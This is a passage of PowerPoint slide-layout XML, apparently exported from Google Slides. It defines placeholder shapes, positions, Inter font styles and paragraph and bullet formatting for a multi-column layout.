                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p4"/>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lumns">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="39" name="Shape 39"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555306" y="1315672"/>
            <a:ext cx="1531200" cy="3162300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFEF"/>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41" name="Google Shape;41;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2412188" y="1315672"/>
            <a:ext cx="1531200" cy="3162300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFEF"/>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42" name="Google Shape;42;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2412188" y="1315671"/>
            <a:ext cx="1531200" cy="798900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;43;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4024181" y="1315671"/>
            <a:ext cx="1531200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555325" y="1315671"/>
            <a:ext cx="1531200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150744" y="1315671"/>
            <a:ext cx="1531200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;47;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886931" y="1938274"/>
            <a:ext cx="1357800" cy="2483700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
